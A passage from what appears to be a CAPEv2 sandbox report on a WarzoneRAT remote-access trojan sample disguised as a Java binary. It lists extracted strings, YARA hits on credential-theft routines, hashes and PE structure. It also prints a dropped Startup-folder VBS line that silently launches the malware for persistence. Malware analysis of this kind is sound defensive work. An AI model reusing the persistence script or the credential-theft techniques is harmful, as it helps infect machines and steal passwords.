"IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII", "fDenyTSConnections", "NETAPI32.dll", "jR|c^", "_zO9*", "o@f:@", "u[_UVMv", "ChangeServiceConfigW", "jr1dI", "J5Y20", "@xNOa$", "iWR>;", "YYz>G", "Vn_Xy", "F49S.", "Ku6!`", "PolyLine0", "$^I7RD+", " G(tL", "1@8Ah", "nNF2WDII", "Y`}6,", "%XR-C", "> Imxs@7", "J2MBII", "'1'PGT", "?ggvC", "r+2 VL", "0JVkF#4N", "{nrDh", "PolyLine11", "PolyLine58", "wv:GOL", "PolyLine34", "[YK>I", "T]jvL", "2%V$>", "p-[j-", "U\\RK?9", "1 1-1", "|#Ul4", "i'[3DL", "![38U", "V.27:", "U`yZs|", "eRsD;", "CreateMutexA", "8w5$_", "PolyLine2", "!=B(S", "|OJmLK", "TextOutA", "PolyLine32", "Polygon35", "zOuaD", "=K/:A", "e#&>hxq", "IIIIIIJIIIIIiJIIIIII", "1BVs}O", "by VfG[", "Yk50>", "vl4XIb", "vHoU^uRM", "sqlite3_close", "/MZnh9", "svchost.exe -k", "C{c|4C", "sqlite3_open", "__setusermatherr", "~lKTs", "J26@II", "oL1rM", "u|=~1", "wwDznhB", "LJJJ2$", "J-IJJ", "KJJJ}", "_vJJJ", "2\"!II", "+k,*QJ", " Msd,", "sKa{g", "8g9|9", "@L5OE", "G$;C,u;", ".'&", "Iz/UU", "N/LN_", "Ue~go", "S@],H", "[y\"%i", "s4Vh ", "I3j\\2", "rCE- V", "2P}L4", "\\}/pMID^", "YQqV[k", "Polygon16", "Da3ES", "PolyLine40", "oA|h>", "bik|]k", "U>ISQ", "|tIbX]", "IZKwzJIIIIIIIZIIIIY", "oqC9&4", "WJPae", ";h)s)", "bm{*)", "%hb*)J", "PathFindFileNameW", ">MIG", "v4@k~:$", "yu/)=", "~|c\\l", "-u|S{v", "6 l+tSb", "LJD_sOz", "VaRY|", "IBhb:", "J2y,II", "h~i]J", "2.2A2T2g2z2", "PolyLine33", "9c}OU", "F]1$`S", "4qyR8HC", "JM(q<-D?U^", "Wlw!2%", "ts^')5", "QebRO", "W|?c\"uZK", "M}{wom", "gP!Rj", "1HZPO+", "NJJJs", "=sfud", "ui4b:", "1Lr,,.", "JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ", "2,3II", "7I0#V", "RIgc7x", "t- >J", "d*ju^{s", "]ZrDJ", "N}7$p", "^y=++/", "t+Td>", "GIII,", "9LJ,+1", "^Z9UB:", "h>8[!", "\"idZ!o", "X&w@=", "GkK=\\;", "~9~A~E~I", "miVkG", "cp]?o", "{x7`[o", "Assert", "g`J}tN", "SUVW3", "&>G\"t", "[h9vN", "}fmynXR", "GrayStringA", "QaD'{)", "e,41u", "aiFAs", "HA6`mRS", "(5k)`", "IJP%J8Py", "M ]|Pt", "VaultGetItem", "@54nC", "`WuNhs", "t*Q8?", "B&P: ", "otT~{I", "T)I\\P", "TGr':", "yid]b", "C*dg|", "e", "szqc_Z", "IIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ", "!`|`|[", "g{VbV", "RDPClip", "ykwz~", "CG('t", "C0 mL", "J2(?II", "lstrcpyA", "V_ec]", "dz$u&", "2{'II", "PolyLine1", "J0IJJ", "Rsi :", "};&2'", "PSAPI.DLL", "|!|%|)|-|1|5|9|=|M}m}u}y}}}", "LeftFlowerPetal3", "_}ioh", "PolyLine44", "oPxe|", "J@IJJ", "S5t %z1", "_UOgj", "ZvYv3", "TS[5E", "emjRkWI", "q}@S8", "AEe;D_c=", "X/4LEZ+d", "rLN{IQ", "JJJIIIIOJJJ", "%[)AF", "UKPLE", "@(3YO", "__getmainargs", "iQYPm", "nk3B^.", "lMteo", "\\J%?/C", "R[#X\"~", ">U!)&z", "Z,gj3", "?O1zH", "/>T9[", "%0^:{", "3i$M^I", "+Ij2\\", "", "mLKUp", "cdsE$F/", "_y|gv", "5g@|3", "xttx)", "%'Xad", "%>?|c@" ], "virustotal": { "error": true, "msg": "Unable to complete connection to VirusTotal. Status code: 429" }, "selfextract": { "overlay": { "extracted_files": [ { "name": "61f9873ad36fa6a305c6443e8a35192243d1ce80da6592c9e8040c891970d406", "path": "/opt/CAPEv2/storage/analyses/1889/selfextracted/61f9873ad36fa6a305c6443e8a35192243d1ce80da6592c9e8040c891970d406", "guest_paths": [ "overlay" ], "size": 2745158, "crc32": "C342FC54", "md5": "22992964bea80b0f25f5608d3b7476f3", "sha1": "2176f00673c660fe11811fab9d16239e7a812a2c", "sha256": "61f9873ad36fa6a305c6443e8a35192243d1ce80da6592c9e8040c891970d406", "sha512": "629a620a743b0fa42f134be5f52e0cbfe20940fb6d8e0c7894284b5796ade9c81ece73fe893f2d3f37a60e5d7b4e8c78abc68975114a6dbd105803626c88f798", "rh_hash": null, "ssdeep": "24576:KmZZcVKfIxTiEVc847flVC6faaQDbGV6eH81k6IbGD2JTu0GoZQDbGV6eH81kG:Kmw4gxeOw46fUbNecCCFbNecX", "type": "data", "yara": [], "cape_yara": [ { "name": "WarzoneRAT", "meta": { "author": "ditekshen", "description": "WarzoneRAT payload", "cape_type": "WarzoneRAT Payload" }, "strings": [ "PK11_CheckUserPassword", "PK11_Authenticate", "PK11SDR_Decrypt", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", "AVE_MARIA", "127.0.0.", "R\u0000D\u0000P\u0000C\u0000l\u0000i\u0000p\u0000", "G\u0000r\u0000a\u0000b\u0000b\u0000e\u0000r\u0000", "@\u0000\\\u0000c\u0000m\u0000d\u0000.\u0000e\u0000x\u0000e\u0000", "/\u0000n\u0000:\u0000%\u0000t\u0000e\u0000m\u0000p\u0000%\u0000\\\u0000e\u0000l\u0000l\u0000o\u0000c\u0000n\u0000a\u0000k\u0000.\u0000x\u0000m\u0000l\u0000", "H\u0000e\u0000y\u0000 \u0000I\u0000'\u0000m\u0000 \u0000A\u0000d\u0000m\u0000i\u0000n\u0000", "s\u0000o\u0000f\u0000t\u0000o\u0000k\u0000n\u00003\u0000.\u0000d\u0000l\u0000l\u0000", "n\u0000s\u0000s\u00003\u0000.\u0000d\u0000l\u0000l\u0000", "l\u0000o\u0000g\u0000i\u0000n\u0000s\u0000.\u0000j\u0000s\u0000o\u0000n\u0000" ], "addresses": { "s1_1": 2387859, "s1_2": 2387799, "s1_3": 2387819, "s1_4": 2389991, "s1_5": 2391475, "s1_6": 2386419, "s2_1": 2391379, "s2_2": 2392283, "s2_5": 2391429, "s2_6": 2401591, "s2_7": 2401639, "d1": 2387699, "d2": 2387511, "d3": 2388193 } } ], "clamav": [], "tlsh": "T190D5AFE27F6A4457FD339BB3A20F71605888BC7E5210EEEFAF152B4990D31D18186D4A", "sha3_384": "ad0a671d5873dda23bc594ffa9237cdbec041e13ce120d9fa00a278a9fdc727e5b4d0de604bf0fd50aefeb45a7e46e2e", "data": null } ], "extracted_files_time": 0.003394651983398944, "password": "" } }, "cape_type_code": 0, "cape_type": "WarzoneRAT Payload: 32-bit executable" } }, "detections": [ { "family": "WarzoneRAT", "details": [ { "Yara": "f1e62c0e7345fc825586f84330908165e28e70b1126301b9763727dfb9a178ce" }, { "Yara": "7defec1ca7f2b1b0757b40463d8ee1591d7e3261142fa55b3aca0b774cd0d158" } ] } ], "detections2pid": { "4492": [ "WarzoneRAT" ] }, "dropped": [ { "name": [ "x.vbs" ], "path": "/opt/CAPEv2/storage/analyses/1889/files/cf7ba288d3b253fa1eeb4be78718eb6e758f923426917a8f86e95889d5e5c133", "guest_paths": [ "C:\\Users\\pacop\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs" ], "size": 121, "crc32": "81D0528C", "md5": "9f79c79a2b919d707fb5be2e612b57b6", "sha1": "b47ccef0eccfd108f1cc9dd14e69482ece227945", "sha256": "cf7ba288d3b253fa1eeb4be78718eb6e758f923426917a8f86e95889d5e5c133", "sha512": "d410de6b518ccb45ef02e14ee5311998c3b943e6ad98f58ba0e537b2701cf6a7c7f96f4711f5dea43c952965663012e51b83a108e36050f6f4cf92a971cbfe82", "rh_hash": null, "ssdeep": "3:VfX9GTfmQKn0eFH5Oud84E2J5xAIFSAKRQdgEakn:VtGTfmQolFHIud8J23fFuRrkn", "type": "ASCII text, with CRLF line terminators", "yara": [], "cape_yara": [], "clamav": [], "tlsh": "T157B0927EB887E1121229018A022A568EC98148BA291093216A18D80821A082AAA4A265", "sha3_384": "801a61da62d413533921ae2482de25a37435bad76044e19f2ebace8d70d5acf120917b80836f0488ff7460b1bb8d76b3", "data": "on error resume next:CreateObject(\"WScript.Shell\").Run \"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe\",1: \n", "strings": [], "virustotal": { "error": true, "msg": "Unable to complete connection to VirusTotal. Status code: 429" }, "cape_type_code": 0, "cape_type": "", "pid": "" } ], "CAPE": { "payloads": [ { "name": "1723ac59986f82d29ed48fcf6f24fb977122d39f0d13098bd0d0b14524e9b850", "path": "/opt/CAPEv2/storage/analyses/1889/CAPE/1723ac59986f82d29ed48fcf6f24fb977122d39f0d13098bd0d0b14524e9b850", "guest_paths": "9;?C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe;?C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe;?0x04970000;?", "size": 473680, "crc32": "70E951F9", "md5": "140dee8a7b08b370743b958f6d01a6f6", "sha1": "6f040b35fb72c40bcd6ca7e911570c57471760be", "sha256": "1723ac59986f82d29ed48fcf6f24fb977122d39f0d13098bd0d0b14524e9b850", "sha512": "22ab30214f2e63a72d12f43f2e833433753c5b5772d9cff0e768946c677021adb83199649cd6eff2e168530b78e8a7308861582dcaba142ab291a527b81ec59b", "rh_hash": null, "ssdeep": "6144:OIbsqd2DU0I6vzSHzu3EHQXVnMJ0sqjZ/w/PIgNOwYcCd3kZ0NxBlGc3N:OIbsBDU0I6+Tu0TJ0N1oYgNOFrUc9", "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "yara": [ { "name": "INDICATOR_EXE_Packed_ASPack", "meta": { "description": "Detects executables packed with ASPack", "author": "ditekSHen" }, "strings": [ "{ 00 00 C0 2E 61 73 70 61 63 6B 00 00 }" ], "addresses": { "s1": 669 } } ], "cape_yara": [], "clamav": [], "tlsh": "T15DA418E03154818BE59776F0FC4EDA6035873CDF93A19B5963A3FD2EE087252035BA4A", "sha3_384": "7c95d751049ca09e206256a72ab911582906513340b0b80a9869e64b37d7c6d639dc8b2396f6280e29586bf46a3dc082", "pe": { "guest_signers": { "aux_sha1": null, "aux_timestamp": null, "aux_valid": false, "aux_error": true, "aux_error_desc": "No signature found.", "aux_signers": [] }, "digital_signers": [], "imagebase": "0x00400000", "entrypoint": "0x000e7001", "ep_bytes": "60e803000000e9eb045d4555c3e80100", "peid_signatures": null, "reported_checksum": "0x0013a3eb", "actual_checksum": "0x0007f919", "osversion": "4.0", "pdbpath": null, "imports": { "kernel32": { "dll": "kernel32.dll", "imports": [ { "address": "0x4e7fb8", "name": "GetProcAddress" }, { "address": "0x4e7fbc", "name": "GetModuleHandleA" }, { "address": "0x4e7fc0", "name": "LoadLibraryA" } ] } }, "exported_dll_name": null, "exports": [], "dirents": [ { "name": "IMAGE_DIRECTORY_ENTRY_EXPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_IMPORT", "virtual_address": "0x000e8008", "size": "0x00000028" }, { "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE", "virtual_address": "0x000a5000", "size": "0x00041d04" }, { "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_SECURITY", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC", "virtual_address": "0x000e7fb0", "size": "0x00000008" }, { "name": "IMAGE_DIRECTORY_ENTRY_DEBUG", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_TLS", "virtual_address": "0x000e7f98", "size": "0x00000018" }, { "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_IAT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_RESERVED", "virtual_address": "0x00000000", "size": "0x00100000" } ], "sections": [ { "name": ".text", "raw_address": "0x00000400", "virtual_address": "0x00001000", "virtual_size": "0x0008e000", "size_of_data": "0x00039c00", "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xe0000060", "entropy": "8.00" }, { "name": ".itext", "raw_address": "0x0003a000", "virtual_address": "0x0008f000", "virtual_size": "0x00001000", "size_of_data": "0x00000600", "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xe0000060", "entropy": "7.20" }, { "name": ".data", "raw_address": "0x0003a600", "virtual_address": "0x00090000", "virtual_size": "0x00003000", "size_of_data": "0x00001200", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc0000040", "entropy": "7.82" }, { "name": ".bss", "raw_address": "0x0003b800", "virtual_address": "0x00093000", "virtual_size": "0x00004000", "size_of_data": "0x00000000", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc0000040", "entropy": "0.00" }, { "name": ".idata", "raw_address": "0x0003b800", "virtual_address": "0x00097000", "virtual_size": "0x00003000", "size_of_data": "0x00000e00", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc0000040", "entropy": "7.70" }, { "name": ".tls", "raw_address": "0x0003c600", "virtual_address": "0x0009a000", "virtual_size": "0x00001000", "size_of_data": "0x00000000", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc0000040", "entropy": "0.00" }, { "name": ".rdata", "raw_address": "0x0003c600", "virtual_address": "0x0009b000", "virtual_size": "0x00001000", "size_of_data": "0x00000200", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc0000040", "entropy": "0.20" }, { "name": ".reloc", "raw_address": "0x0003c800", "virtual_address": "0x0009c000", "virtual_size": "0x00009000", "size_of_data": "0x00000000", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc2000040", "entropy": "0.00" }, { "name": ".rsrc", "raw_address": "0x0003c800", "virtual_address": "0x000a5000", "virtual_size": "0x00042000", "size_of_data": "0x00006400", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc0000040", "entropy": "7.58" }, { "name": ".aspack", "raw_address": "0x00042c00", "virtual_address": "0x000e7000", "virtual_size": "0x0002c000", "size_of_data": "0x0002bc00", "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xe0000060", "entropy": "4.96" }, { "name": ".adata", "raw_address": "0x0006e800", "virtual_address": "0x00113000", "virtual_size": "0x00001000", "size_of_data": "0x00000000", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xe0000040", "entropy": "0.00" } ], "overlay": { "offset": "0x0006e800", "size": "0x00005250" }, "resources": [ { "name": "RT_CURSOR", "offset": "0x000a5d88", "size": "0x00000134", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "7.23" }, { "name": "RT_CURSOR", "offset": "0x000a5ebc", "size": "0x00000134", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "7.32" }, { "name": "RT_CURSOR", "offset": "0x000a5ff0", "size": "0x00000134", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "7.28" }, { "name": "RT_CURSOR", "offset": "0x000a6124", "size": "0x00000134", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "7.31" }, { "name": "RT_CURSOR", "offset": "0x000a6258", "size": "0x00000134", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "7.29" }, { "name": "RT_CURSOR", "offset": "0x000a638c", "size": "0x00000134", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "5.74" }, { "name": "RT_CURSOR", "offset": "0x000a64c0", "size": "0x00000134", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "4.14" }, { "name": "RT_BITMAP", "offset": "0x000a65f4", "size": "0x000001d0", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "4.73" }, { "name": "RT_BITMAP", "offset": "0x000a67c4", "size": "0x000001e4", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "7.59" }, { "name": "RT_BITMAP", "offset": "0x000a69a8", "size": "0x000001d0", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "7.47" }, { "name": "RT_BITMAP", "offset": "0x000a6b78", "size": "0x000001d0", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "7.52" }, { "name": "RT_BITMAP", "offset": "0x000a6d48", "size": "0x000001d0", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "7.50" }, { "name": "RT_BITMAP", "offset": "0x000a6f18", "size": "0x000001d0", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "7.50" }, { "name": "RT_BITMAP", "offset": "0x000a70e8", "size": "0x000001d0", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "7.50" }, { "name": "RT_BITMAP", "offset": "0x000a72b8", "size": "0x000001d0", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "7.46" }, { "name": "RT_BITMAP", "offset": "0x000a7488", "size": "0x000001d0", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "7.51" }, { "name": "RT_BITMAP", "offset": "0x000a7658", "size": "0x000001d0", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "7.50" }, { "name": "RT_BITMAP", "offset": "0x000a7828", "size": "0x000000e8", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "7.10" }, { "name": "RT_ICON", "offset": "0x00110f34", "size": "0x00001ca8", "filetype": null, "language": "LANG_ARABIC", "sublanguage": "SUBLANG_ARABIC_EGYPT", "entropy": "2.71" }, { "name": "RT_ICON", "offset": "0x0011028c", "size": "0x00000ca8", "filetype": null, "language": "LANG_ARABIC", "sublanguage": "SUBLANG_ARABIC_EGYPT", "entropy": "2.72" }, { "name": "RT_ICON", "offset": "0x0010ff24", "size": "0x00000368", "filetype": null, "language": "LANG_ARABIC", "sublanguage": "SUBLANG_ARABIC_EGYPT", "entropy": "3.83" }, { "name": "RT_ICON", "offset": "0x000ff6fc", "size": "0x00010828", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "4.47" }, { "name": "RT_ICON", "offset": "0x000f6254", "size": "0x000094a8", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "4.94" }, { "name": "RT_ICON", "offset": "0x000f0dcc", "size": "0x00005488", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "5.13" }, { "name": "RT_ICON", "offset": "0x000ecba4", "size": "0x00004228", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "4.81" }, { "name": "RT_ICON", "offset": "0x000ea5fc", "size": "0x000025a8", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "5.05" }, { "name": "RT_ICON", "offset": "0x000e9554", "size": "0x000010a8", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "5.15" }, { "name": "RT_ICON", "offset": "0x000e8bcc", "size": "0x00000988", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "5.64" }, { "name": "RT_ICON", "offset": "0x000e8764", "size": "0x00000468", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "5.24" }, { "name": "RT_DIALOG", "offset": "0x000d1d88", "size": "0x00000052", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_DIALOG", "offset": "0x000d1ddc", "size": "0x00000052", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_STRING", "offset": "0x000d1e30", "size": "0x000000a8", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_STRING", "offset": "0x000d1ed8", "size": "0x00000350", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_STRING", "offset": "0x000d2228", "size": "0x000002a4", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_STRING", "offset": "0x000d24cc", "size": "0x000000b4", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_STRING", "offset": "0x000d2580", "size": "0x000000f0", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_STRING", "offset": "0x000d2670", "size": "0x0000022c", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_STRING", "offset": "0x000d289c", "size": "0x00000410", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_STRING", "offset": "0x000d2cac", "size": "0x00000384", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_STRING", "offset": "0x000d3030", "size": "0x00000394", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_STRING", "offset": "0x000d33c4", "size": "0x000003a0", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_STRING", "offset": "0x000d3764", "size": "0x00000214", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_STRING", "offset": "0x000d3978", "size": "0x000000cc", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_STRING", "offset": "0x000d3a44", "size": "0x00000194", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_STRING", "offset": "0x000d3bd8", "size": "0x000003c4", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_STRING", "offset": "0x000d3f9c", "size": "0x00000338", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_STRING", "offset": "0x000d42d4", "size": "0x00000294", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_RCDATA", "offset": "0x000d4568", "size": "0x00000010", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_RCDATA", "offset": "0x000d4578", "size": "0x000002b8", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_RCDATA", "offset": "0x000d4830", "size": "0x00011b4a", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_RCDATA", "offset": "0x000e637c", "size": "0x000001c6", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "0.00" }, { "name": "RT_GROUP_CURSOR", "offset": "0x000e6544", "size": "0x00000014", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "0.00" }, { "name": "RT_GROUP_CURSOR", "offset": "0x000e6558", "size": "0x00000014", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "0.00" }, { "name": "RT_GROUP_CURSOR", "offset": "0x000e656c", "size": "0x00000014", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "0.00" }, { "name": "RT_GROUP_CURSOR", "offset": "0x000e6580", "size": "0x00000014", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "0.00" }, { "name": "RT_GROUP_CURSOR", "offset": "0x000e6594", "size": "0x00000014", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "0.00" }, { "name": "RT_GROUP_CURSOR", "offset": "0x000e65a8", "size": "0x00000014", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "0.00" }, { "name": "RT_GROUP_CURSOR", "offset": "0x000e65bc", "size": "0x00000014", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "0.00" }, { "name": "RT_GROUP_ICON", "offset": "0x000e86ec", "size": "0x00000076", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "3.15" }, { "name": "RT_GROUP_ICON", "offset": "0x000e86bc", "size": "0x00000030", "filetype": null, "language": "LANG_ARABIC", "sublanguage": "SUBLANG_ARABIC_EGYPT", "entropy": "2.56" }, { "name": "RT_VERSION", "offset": "0x000e8030", "size": "0x0000068c", "filetype": null, "language": "LANG_NEUTRAL", "sublanguage": "SUBLANG_NEUTRAL", "entropy": "2.03" } ], "versioninfo": [ { "name": "CompanyName", "value": "Oracle Corporation" }, { "name": "FileDescription", "value": "Java(TM) Platform SE binary" }, { "name": "FileVersion", "value": "8.0.1810.13" }, { "name": "Full Version", "value": "1.8.0_181-b13" }, { "name": "InternalName", "value": "unpack200" }, { "name": "LegalCopyright", "value": "Copyright © 2018" }, { "name": "OriginalFilename", "value": "unpack200.exe" }, { "name": "ProductName", "value": "Java(TM) Platform SE 8" }, { "name": "ProductVersion", "value": "8.0.1810.13" }, { "name": "Translation", "value": "0x0000 0x04b0" } ], "imphash": "5a498eee87e4d89512a84502f500181f", "timestamp": "1992-06-19 23:22:17", "icon": 